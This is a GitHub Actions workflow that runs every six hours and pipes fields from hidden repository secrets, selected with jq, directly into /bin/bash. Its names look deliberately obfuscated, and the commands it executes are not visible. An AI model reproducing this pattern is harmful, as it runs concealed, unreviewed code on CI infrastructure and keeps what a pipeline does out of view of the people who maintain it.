name: laojiangzhongzheng

on:
  workflow_dispatch:
  schedule:
    - cron: '21 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: laojiangzhongzheng
        env:
          suu02: ${{ secrets.suu02 }}
        run: |
          echo $suu02 | jq -r .oape537 | /bin/bash
          echo $bbt4 | jq -r .kbt49723 | /bin/bash
          echo $bluri91474 | jq -r .tczlp446 | /bin/bash
          echo $gokm96 | jq -r .skrtd5 | /bin/bash
          echo $d786 | jq -r .js91371 | /bin/bash
          echo $qjj38602 | jq -r .fcskb8 | /bin/bash

